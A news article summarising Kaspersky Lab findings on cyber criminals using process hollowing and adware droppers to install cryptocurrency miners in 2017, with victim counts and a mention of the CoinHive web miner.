Kaspersky Lab researchers have discovered that cyber criminals have begun using sophisticated infection methods and techniques borrowed from targeted attacks to install mining software on infected PCs.
The company says the most successful group it noted earned at least $7 million by exploiting their victims in just six months of 2017.
The crypto-currency market is volatile, and the surge in the value of Bitcoin in 2017 has significantly changed global economics and the world of cyber security too.
"With the aim of earning crypto-currency, criminals have started to use mining software in their attacks, which, like ransomware, has a simple monetisation model. But, unlike ransomware, it doesn't destructively harm users and is able to stay undetected for a long time by silently using the PC's power," Kaspersky adds.
The security giant's researchers recently identified a cyber criminal group with APT techniques in their arsenal of tools used to infect users with miners. "They have been using the process-hollowing method that is usually used in malware and has been seen in some targeted attacks of APT actors, but has never been observed in mining attacks before."
How it works
During the attacks, the victim is tricked into downloading and installing advertisement software with the miner installer hidden inside. This installer drops a legitimate Windows utility to download the miner itself from a remote server.
Following execution, a legitimate system process starts, and the legitimate code of this process is changed to malicious code. In this way, the miner operates under the guise of a legitimate task, so the user will be unable to see that a mining infection has taken place.
This threat can also slip through the security net, as the process of installing the miner restricts any task cancellation. "If the user tries to stop the process, the computer system will reboot. As a result, criminals protect their presence in the system for a longer and more productive time."
Anton Ivanov, lead malware analyst at Kaspersky Lab, says that ransomware is fading into the background and miners growing in popularity. Kaspersky Lab statistics confirm this, showing a steady growth of miners throughout the year. "Cyber criminal groups are actively developing their methods and have already started to use more sophisticated techniques to spread mining software."
This evolution was also noted with ransomware attackers, who used the same tricks when they were on the rise.
Adware, cracked games, pirated software
According to Kaspersky data, some 2.7 million users were attacked by malicious miners in 2017, 50% higher than the previous year.
"They have been falling victim as a result of adware, cracked games and pirated software used by cyber criminals to secretly infect their PCs. Another approach employed was Web mining through a special code located in an infected Web page. The most widely used Web miner was CoinHive, discovered on many popular Web sites."
Share